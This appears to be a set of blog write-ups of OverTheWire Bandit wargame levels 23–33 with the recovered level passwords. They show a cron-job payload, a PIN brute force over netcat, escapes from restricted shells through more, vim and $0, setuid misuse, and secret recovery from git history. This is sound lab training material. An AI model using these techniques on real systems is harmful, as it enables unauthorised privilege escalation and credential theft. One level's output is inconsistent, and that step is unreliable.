Skip to main content

47 posts tagged with "overthewire"

View All Tags

Bandit Level 23 → 24

Shubham
Cybersecurity Enthusiast

Login: ssh bandit23@bandit.labs.overthewire.org -p 2220
Password: 0Zf11ioIjMVN551jX3CmStKLYqjk54Ga

task

A program is running automatically at regular intervals from cron. Look in /etc/cron.d/ for the configuration and see what command is being executed.

theory lil bit

  1. Cronjobs running as other users: The script is scheduled in /etc/cron.d to run as the bandit24 user. This means any commands executed by the script run with bandit24's privileges.
  2. File Ownership (stat -c "%U"): The cron script checks the owner of the files in a specific directory. It specifically looks for files owned by bandit23 to execute.
  3. Payload Execution: If the script finds a file owned by bandit23, it executes it. By writing a simple bash script that copies the password to a world-writable directory, we can trick bandit24 into doing the heavy lifting for us.
  4. Permissions (chmod 777): Since the script runs as bandit24, it needs permission to write the output file into our bandit23 temporary directory. Setting the directory permissions to 777 ensures this works.

solution

# 1. Check the cron configuration for bandit24
bandit23@bandit:~$ cd /etc/cron.d
bandit23@bandit:/etc/cron.d$ cat cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null

# 2. Analyze the script logic
bandit23@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash
shopt -s nullglob

myname=$(whoami)

cd /var/spool/"$myname"/foo || exit
echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
for i in * .*;
do
if [ "$i" != "." ] && [ "$i" != ".." ];
then
echo "Handling $i"
owner="$(stat --format "%U" "./$i")"
if [ "${owner}" = "bandit23" ] && [ -f "$i" ]; then
timeout -s 9 60 "./$i"
fi
rm -rf "./$i"
fi
done
# The script goes to /var/spool/bandit24/foo
# If it finds a file owned by bandit23, it executes it, then deletes it.

# 3. Create a temporary directory to work in
bandit23@bandit:/etc/cron.d$ mktemp -d
/tmp/tmp.RXCBGeylmO
bandit23@bandit:/etc/cron.d$ cd /tmp/tmp.RXCBGeylmO

# 4. Give read/write/execute permissions to everyone on the temp directory
# This allows bandit24 to write the password file here
bandit23@bandit:/tmp/tmp.RXCBGeylmO$ chmod 777 .

# 5. Create the payload script to steal the password
# (Using nano or echo to write the script)
bandit23@bandit:/tmp/tmp.RXCBGeylmO$ echo '#!/bin/bash' > bandit24.sh
bandit23@bandit:/tmp/tmp.RXCBGeylmO$ echo 'cat /etc/bandit_pass/bandit24 > /tmp/tmp.RXCBGeylmO/password.txt' >> bandit24.sh

# 6. Make the script executable
bandit23@bandit:/tmp/tmp.RXCBGeylmO$ chmod +rwx bandit24.sh

# 7. Copy the payload script into the target directory where the cronjob looks
bandit23@bandit:/tmp/tmp.RXCBGeylmO$ cp bandit24.sh /var/spool/bandit24/foo/myscript.sh

# 8. Wait a minute for the cronjob to run, then check for the new password file
bandit23@bandit:/tmp/tmp.RXCBGeylmO$ ls -la
total 180
drwxrwxrwx 2 bandit23 bandit23 4096 Apr 11 20:45 .
drwxrwx-wt 4284 root root 167936 Apr 11 20:45 ..
-rwxrwxr-x 1 bandit23 bandit23 77 Apr 11 20:43 bandit24.sh
-rw-rw-r-- 1 bandit24 bandit24 33 Apr 11 20:45 password.txt

# 9. Read the target password
bandit23@bandit:/tmp/tmp.RXCBGeylmO$ cat password.txt
gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8

`

Bandit Level 24 → 25

Shubham
Cybersecurity Enthusiast

Login: ssh bandit24@bandit.labs.overthewire.org -p 2220
Password: gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8

task

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.

theory lil bit

  1. Process Enumeration: Using ps aux | grep helps identify background services or processes running under specific user accounts.
  2. Port Scanning: nmap is used to verify if a specific port on localhost is actually open and listening.
  3. Manual Interaction: Before writing a script, it's crucial to connect to the service manually (using nc) to understand exactly what input format the program expects and what output it gives.
  4. Brute-Forcing with Loops: A bash for loop combined with brace expansion {0000..9999} is the fastest way to generate all possible 4-digit PINs. Piping (|) this massive output directly into nc automates the attack.

my approach / solution

1. Reconnaissance: First, I wanted to see if there were any obvious processes running for bandit25.

bandit24@bandit:~$ ps aux | grep bandit25

I also poked around /var/run to see if there were any interesting socket or PID files, but didn't find anything immediately useful for this challenge.

2. Verifying the Port: I knew from the prompt that a service was on port 30002. After a quick typo with an nmap flag, I scanned the port locally to confirm it was up and listening as pago-services2.

bandit24@bandit:~$ nmap localhost -p 30002
Starting Nmap 7.94SVN ...
PORT STATE SERVICE
30002/tcp open pago-services2

3. Manual Testing: Before writing any scripts, I connected manually to see what the daemon actually wanted. First, I just piped the password, but it failed. Then, I connected interactively and typed a few random guesses (0 0 0 0, 0 0 0 1) to see how it handled bad inputs.

bandit24@bandit:~$ nc localhost 30002 I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space. 0 0 0 0 Wrong! Please enter the correct current password and pincode. Try again.

4. The Brute-Force Attack: Once I understood the format (<password> <pin>), I wrote a one-liner bash for loop to generate all numbers from 0000 to 9999. I echoed the password alongside the generated PIN and piped the entire 10,000-line stream directly into the netcat connection.

bandit24@bandit:~$ for i in {0000..9999}; do echo "gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8 $i"; done | nc localhost 30002

5. Catching the Flag: The script fired off thousands of attempts in seconds. The terminal flooded with "Wrong!" messages until it finally hit the correct PIN, breaking the loop with the success message:

Wrong! Please enter the correct current password and pincode. Try again. Correct! The password of user bandit25 is iCi86ttT4KSNe1armKiwbQNmB3YJP3q4

`

Bandit Level 25 → 26

Shubham
Cybersecurity Enthusiast

Login: ssh bandit25@bandit.labs.overthewire.org -p 2220
Password: iCi86ttT4KSNe1armKiwbQNmB3YJP3q4

task

Logging in to bandit26 from bandit25 should be quite easy. The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works, and how to break out of it.

theory lil bit

  1. SSH Key Permissions: SSH is very strict about security. If a private key file (.sshkey) is readable by other users, SSH will reject it to prevent abuse. You must set permissions to 700 or 600.
  2. Custom Login Shells: The /etc/passwd file defines what program runs when a user logs in. It doesn't have to be a standard shell like /bin/bash; it can be any executable script. If that script exits, your SSH session ends.
  3. Escaping Pagers (more): When a program like more (a pager) outputs text that is larger than your terminal window, it pauses. While paused, you can use built-in commands. Pressing v tells more to open the current file in the vim text editor.
  4. Vim Shell Escaping: vim has the ability to run system commands or spawn a new shell. By changing vim's internal shell setting (:set shell=/bin/bash) and then calling it (:shell), you can break out of a restricted environment and get a fully functional terminal.

my approach / solution

1. Finding and Fixing the SSH Key: I logged in and found bandit26.sshkey right in the home directory. I tried to use it to SSH into bandit26, but SSH yelled at me about bad permissions:

WARNING: UNPROTECTED PRIVATE KEY FILE! Permissions 0755 for 'bandit26.sshkey' are too open.

I fixed this by restricting the permissions so only my user could read it: bandit25@bandit:~$ chmod 700 bandit26.sshkey

2. The Disappearing Shell Problem: When I tried to SSH after fixing the key, the server displayed an OverTheWire banner and then immediately kicked me out. I needed to figure out what was happening upon login.

I checked the /etc/passwd file for bandit26 to see what shell it was using: bandit25@bandit:~$ cat /etc/passwd | grep bandit26 bandit2611026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext

Instead of /bin/bash, it was running a custom script called /usr/bin/showtext. I checked the contents of that script: bandit25@bandit:~$ cat /usr/bin/showtext #!/bin/sh export TERM=linux exec more ~/text.txt exit 0

3. Breaking out of more: The script simply runs more on a text file and then exits. If I could interact with more before it finished printing the file, I could escape it. I reduced my terminal window size (so the text wouldn't fit on one screen) forcing more to pause.

I logged in via SSH again, but this time i resized my terminal to a very small size... the screen paused at the bottom ... instead of hitting space to scroll .. i pressed the v key on my keyboard. This is a built-in shortcut that opens the current text block in the vim editor.

4. Spawning a bash shell from Vim: Once inside Vim, I had the ability to run commands. I pressed : to enter command mode and changed Vim's default shell to bash: :set shell=/bin/bash

Then, I pressed : again and told vim to spawn that shell: :shell and yeah ....i was dropped into a normal bash terminal as the user bandit26.

5. Catching the Flag: Now that I had a fully interactive shell, I simply read the password file for bandit26: bandit26@bandit:~$ cat /etc/bandit_pass/bandit26 s0773xxkk0MXfdqOfPRVr9L3jJBUOgCZ

`

Bandit Level 26 → 27

Shubham
Cybersecurity Enthusiast

Login: ssh bandit26@bandit.labs.overthewire.org -p 2220
Password: s0773xxkk0MXfdqOfPRVr9L3jJBUOgCZ

task

Good job getting a shell! Now, there is a setuid binary in the homedirectory that does things for the next user. Find out how to use it to get the password.

theory lil bit

  1. SUID (Set User ID): Sometimes executables are configured to run with the permissions of the user who owns the file, rather than the user who runs the file. This script is owned by bandit27 and has the SUID bit set, meaning any command we pass into it will be executed with bandit27's privileges.

my approach / solution

1. Inspect the home directory: Right after breaking out of the Vim shell from the previous level, I checked what was sitting in the home directory.

bandit26@bandit:~$ ls bandit27-do text.txt

2. Figure out the binary: I ran the bandit27-do executable without any arguments to see if it had a help menu or expected syntax. It clearly stated it runs commands as another user.

bandit26@bandit:~$ ./bandit27-do Run a command as another user. Example: ./bandit27-do id

3. Test the execution: I ran the example command to verify it was working as intended. The output showed my effective user ID (euid) successfully shifted to bandit27.

bandit26@bandit:~$ ./bandit27-do id uid=11026(bandit26) gid=11026(bandit26) euid=11027(bandit27) groups=11026(bandit26)

4. Capture the password: Since I now had a direct way to execute commands as bandit27, I used the binary to read the protected password file for the next level.

bandit26@bandit:~$ ./bandit27-do cat /etc/bandit_pass/bandit27 upsNCc7vzaRDx6oZC6GiR6ERwe1MowGB

`

Bandit Level 27 → 28

Shubham
Cybersecurity Enthusiast

Login: ssh bandit27@bandit.labs.overthewire.org -p 2220
Password: Ups6nC7Sc695jSGEB7L9J9J6AFRowFuJ

task

A git repository is at ssh://bandit27-git@bandit.labs.overthewire.org:2220/home/bandit27-git/repo. The password for the user bandit27-git is the same as the password for the user bandit27. Clone the repository and find the password for the next level.

theory lil bit

  1. Git Clone: The git clone command is used to create a copy of a specific repository from a remote server onto your local machine.
  2. SSH Protocol: Git can use SSH for data transfer. The URL specifies the user, the host, the port (2220), and the path to the repository.
  3. Repository Exploration: After cloning, you enter the directory to find the files that were tracked by the repository.
  4. Authentication: Since the git user bandit27-git shares the password with the shell user bandit27, you simply reuse the current level's password when prompted.

solution

# Create a temporary directory to work in
┌──(sssubhammm ⌘ macbook-air)-[~]
└─$ mkdir /tmp/my_git_repo && cd /tmp/my_git_repo

# Clone the remote repository using the provided SSH URL
# Use the bandit27 password when prompted
┌──(sssubhammm ⌘ macbook-air)-[/tmp/my_git_repo]
└─$ git clone ssh://bandit27-git@bandit.labs.overthewire.org:2220/home/bandit27-git/repo
Cloning into 'repo'...
bandit27-git@bandit.labs.overthewire.org's password:
remote: Enumerating objects: 3, done.
remote: Counting objects: 100% (3/3), done.
remote: Compressing objects: 100% (2/2), done.
remote: Total 3 (delta 0), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (3/3), done.

# Navigate into the cloned directory and check the contents
┌──(sssubhammm ⌘ macbook-air)-[/tmp/my_git_repo]
└─$ cd repo
┌──(sssubhammm ⌘ macbook-air)-[/tmp/my_git_repo/repo]
└─$ ls
README

# Read the README file to retrieve the password
┌──(sssubhammm ⌘ macbook-air)-[/tmp/my_git_repo/repo]
└─$ cat README
The password to the next level is: Yz9IpL0sBcCeuG7m9uQFt8ZNpS4HZRcN

`

Bandit Level 28 → 29

Shubham
Cybersecurity Enthusiast

Login: ssh bandit28@bandit.labs.overthewire.org -p 2220
Password: Yz9IpL0sBcCeuG7m9uQFt8ZNpS4HZRcN

task

There is a git repository at ssh://bandit28-git@bandit.labs.overthewire.org:2220/home/bandit28-git/repo. The password for the user bandit28-git is the same as the password for the user bandit28. Clone the repository and find the password for the next level.

theory lil bit

  1. Git History: Git stores a snapshot of every change made to a file. Even if sensitive data is overwritten or deleted in the latest version, it remains accessible in the project's history.
  2. Git Log: The git log command displays a list of all commits made to the repository, showing the commit hash, author, and descriptions like "fix info leak."
  3. Git Show: This command is used to view the specific changes (diff) introduced in a particular commit. It highlights what was added (+) and what was removed (-).
  4. Data Sanitization: This level highlights the danger of committing secrets. Simply "fixing" an info leak with a new commit doesn't remove the secret from the underlying .git directory.

solution

# Clone the repository into your workspace
┌──(sssubhammm ⌘ macbook-air)-[~/repo]
└─$ git clone ssh://bandit28-git@bandit.labs.overthewire.org:2220/home/bandit28-git/repo
Cloning into 'repo'...
bandit28-git@bandit.labs.overthewire.org's password:

# Navigate to the repository and check the current file
┌──(sssubhammm ⌘ macbook-air)-[~/repo]
└─$ cd repo
┌──(sssubhammm ⌘ macbook-air)-[~/repo/repo]
└─$ cat README.md
# Bandit Notes
...
- password: xxxxxxxxxx

# Inspect the commit history to find where the "info leak" occurred
┌──(sssubhammm ⌘ macbook-air)-[~/repo/repo]
└─$ git log
commit 00daa614aac60bd2981c381484191eb7bc4dcfd9 (HEAD -> master)
Author: Morla Porla <morla@overthewire.org>
fix info leak

commit a1487fd098591dfa210ede70ba60f7093f47d20d
add missing data

# View the changes in the 'fix info leak' commit to see the original password
┌──(sssubhammm ⌘ macbook-air)-[~/repo/repo]
└─$ git show 00daa614aac60bd2981c381484191eb7bc4dcfd9
...
- password: 4pT1t5DENaYuqnqvadYs1oE4QLCdjmJ7
+ password: xxxxxxxxxx

`

Bandit Level 29 → 30

Shubham
Cybersecurity Enthusiast

Login: ssh bandit29@bandit.labs.overthewire.org -p 2220
Password: 4pT1t5DENaYuqnqvadYs1oE4QLCdjmJ7

task

There is a git repository at ssh://bandit29-git@bandit.labs.overthewire.org:2220/home/bandit29-git/repo. The password for the user bandit29-git is the same as the password for the user bandit29. Clone the repository and find the password for the next level.

theory lil bit

  1. Git Branches: Repositories often have multiple branches (e.g., master, dev, staging). The default branch might not contain the sensitive data you are looking for.
  2. Remote Branches: Use git branch -a to see all branches, including those that exist on the remote server but haven't been checked out locally yet.
  3. Switching Context: The git checkout [branch_name] command allows you to switch between these different versions of the project's codebase.
  4. Information Siloing: Developers often keep "production" branches clean while leaving credentials or debugging code in "development" or "test" branches.

solution

# Clone the repository
┌──(sssubhammm ⌘ macbook-air)-[~/repo/repo]
└─$ git clone ssh://bandit29-git@bandit.labs.overthewire.org:2220/home/bandit29-git/repo
Cloning into 'repo'...
bandit29-git@bandit.labs.overthewire.org's password:

# Navigate and check the default README (password is redacted)
┌──(sssubhammm ⌘ macbook-air)-[~/repo/repo]
└─$ cd repo
┌──(sssubhammm ⌘ macbook-air)-[~/repo/repo/repo]
└─$ cat README.md
- password: <no passwords in production!>

# Check all available branches (local and remote)
┌──(sssubhammm ⌘ macbook-air)-[~/repo/repo/repo]
└─$ git branch -a
* master
remotes/origin/HEAD -> origin/master
remotes/origin/dev
remotes/origin/master
remotes/origin/sploits-dev

# Switch to the 'dev' branch to see if it contains different data
┌──(sssubhammm ⌘ macbook-air)-[~/repo/repo/repo]
└─$ git checkout dev
branch 'dev' set up to track 'origin/dev'.
Switched to a new branch 'dev'

# Check the README.md in the 'dev' branch
┌──(sssubhammm ⌘ macbook-air)-[~/repo/repo/repo]
└─$ cat README.md
# Bandit Notes
Some notes for bandit30 of bandit.

## credentials

- username: bandit30
- password: qp30ex3VLz5MDG1n91YowTv4Q8l7CDZL

`

Bandit Level 30 → 31

Shubham
Cybersecurity Enthusiast

Login: ssh bandit30@bandit.labs.overthewire.org -p 2220
Password: qp30ex3VLz5MDG1n91YowTv4Q8l7CDZL

task

There is a git repository at ssh://bandit30-git@bandit.labs.overthewire.org:2220/home/bandit30-git/repo. The password for the user bandit30-git is the same as the password for the user bandit30. Clone the repository and find the password for the next level.

theory lil bit

  1. Git Tags: Tags are ref pointers to specific points in Git history, usually used to mark release points (like v1.0). Unlike branches, they don't change.
  2. Hidden References: Information isn't always in the files or the commit history logs. Sometimes secrets are hidden in metadata like tags or notes.
  3. Git Tag Command: git tag lists all existing tags in the repository.
  4. Inspecting Tags: Using git show [tag_name] allows you to see the object details or the content associated with that specific tag.

solution

# Clone the repository
┌──(sssubhammm ⌘ macbook-air)-[~/repo/repo/repo]
└─$ git clone ssh://bandit30-git@bandit.labs.overthewire.org:2220/home/bandit30-git/repo
Cloning into 'repo'...
bandit30-git@bandit.labs.overthewire.org's password:

# Enter the repository and check the files
┌──(sssubhammm ⌘ macbook-air)-[~/repo/repo/repo]
└─$ cd repo
┌──(sssubhammm ⌘ macbook-air)-[~/repo/repo/repo/repo]
└─$ ls
README.md
┌──(sssubhammm ⌘ macbook-air)-[~/repo/repo/repo/repo]
└─$ cat README.md
just an epmty file... muahaha

# Check for any git tags
┌──(sssubhammm ⌘ macbook-air)-[~/repo/repo/repo/repo]
└─$ git tag
secret

# View the content of the 'secret' tag
┌──(sssubhammm ⌘ macbook-air)-[~/repo/repo/repo/repo]
└─$ git show secret
fb5S2xb7bRyFmAvQYQGEqsbhVyJqhnDy

`

Bandit Level 31 → 32

Shubham
Cybersecurity Enthusiast

Login: ssh bandit31@bandit.labs.overthewire.org -p 2220
Password: fb5S2xb7bRyFmAvQYQGEqsbhVyJqhnDy

task

There is a git repository at ssh://bandit31-git@bandit.labs.overthewire.org:2220/home/bandit31-git/repo. The goal is to push a file named key.txt with the content "May I come in?" to the remote master branch to receive the next password.

theory lil bit

  1. The .gitignore File: This is a special file that tells Git which files or patterns to ignore. If *.txt is in .gitignore, Git will refuse to track any .txt files by default.
  2. Git Add: To track a new file, it must be staged using git add. If a file is ignored by .gitignore, you may need to modify the ignore file or use git add -f to force it.
  3. Git Commit & Push: git commit records your local changes, and git push sends those commits to the remote server.
  4. Pre-receive Hooks: Remote servers can run scripts (hooks) when you push. In this level, a hook validates your submission and prints the password before technically "declining" the push to reset the level for others.

solution

# Clone the repository
┌──(sssubhammm ⌘ macbook-air)-[~]
└─$ git clone ssh://bandit31-git@bandit.labs.overthewire.org:2220/home/bandit31-git/repo
Cloning into 'repo'...
bandit31-git@bandit.labs.overthewire.org's password:

# Navigate to the repo and create the required file
┌──(sssubhammm ⌘ macbook-air)-[~/repo]
└─$ cd repo
┌──(sssubhammm ⌘ macbook-air)-[~/repo/repo]
└─$ echo "May I come in?" > key.txt

# Notice that key.txt is ignored by .gitignore
┌──(sssubhammm ⌘ macbook-air)-[~/repo/repo]
└─$ cat .gitignore
*.txt

# Remove the restriction from .gitignore so Git can see the file
┌──(sssubhammm ⌘ macbook-air)-[~/repo/repo]
└─$ nvim .gitignore
# (Remove or comment out *.txt)

# Stage the files and commit the change
┌──(sssubhammm ⌘ macbook-air)-[~/repo/repo]
└─$ git add .
┌──(sssubhammm ⌘ macbook-air)-[~/repo/repo]
└─$ git commit -m "add key file"

# Push to the remote master branch
┌──(sssubhammm ⌘ macbook-air)-[~/repo/repo]
└─$ git push origin master
bandit31-git@bandit.labs.overthewire.org's password:
remote: ### Attempting to validate files... ####
remote:
remote: Well done! Here is the password for the next level:
remote: 3O9RfhqyAlVBEZpVb6LYStshZoqoSx5K
remote:
To ssh://bandit.labs.overthewire.org:2220/home/bandit31-git/repo
! [remote rejected] master -> master (pre-receive hook declined)

`

Bandit Level 32 → 33

Shubham
Cybersecurity Enthusiast

Login: ssh bandit32@bandit.labs.overthewire.org -p 2220
Password: 3O9RfhqyAlVBEZpVb6LYStshZoqoSx5K

task

After logging in, you are greeted by the "UPPERCASE SHELL." Every command you enter is converted to uppercase before execution, leading to "Permission denied" errors because Linux commands are case-sensitive (e.g., LS is not the same as ls). You must find a way to escape this restricted shell and read the password for level 33.

theory lil bit

  1. Positional Parameters: In shell scripting, $0 is a special variable that holds the name of the script or the shell currently being executed.
  2. Shell Escape: If you are trapped in a restricted environment that processes your input, calling the shell itself ($0) can sometimes spawn a new, unrestricted sub-shell.
  3. Environment Variables: The uppercase shell logic likely wraps your input in a way that handles standard strings, but it may fail to sanitize or transform shell special variables.
  4. Case Sensitivity: Linux file systems and binaries are case-sensitive. The goal is to regain access to lowercase commands.

solution

# Log in and encounter the Uppercase Shell
┌──(sssubhammm ⌘ macbook-air)-[~]
└─$ ssh bandit32@bandit.labs.overthewire.org -p 2220

WELCOME TO THE UPPERCASE SHELL
>> ls
sh: 1: LS: Permission denied
>> PWD
sh: 1: PWD: Permission denied

# Escape the shell using the $0 variable
# Since $0 is a variable, the shell expands it to the path of the current shell (sh)
# before the 'uppercase' logic can break the command name.
>> $0

# We are now in a standard Bourne Shell (sh)
$ whoami
bandit32

# Note: The level 32 binary is often setuid bandit33.
# Escaping it gives us the privileges of the next user.
$ whoami
bandit33

# Read the final password
$ cat /etc/bandit_pass/bandit33
tQdtbs5D5i2vJwkO8mEyYEyTL8izoeJ0

okay so now lets login into bandit 33, since its the last level we dont have password for next level.


bandit33@bandit:~$ ls
README.txt
bandit33@bandit:~$ cat README.txt
Congratulations on solving the last level of this game!

At this moment, there are no more levels to play in this game. However, we are constantly working
on new levels and will most likely expand this game with more levels soon.
Keep an eye out for an announcement on our usual communication channels!
In the meantime, you could play some of our other wargames.

If you have an idea for an awesome new level, please let us know!
bandit33@bandit:~$

`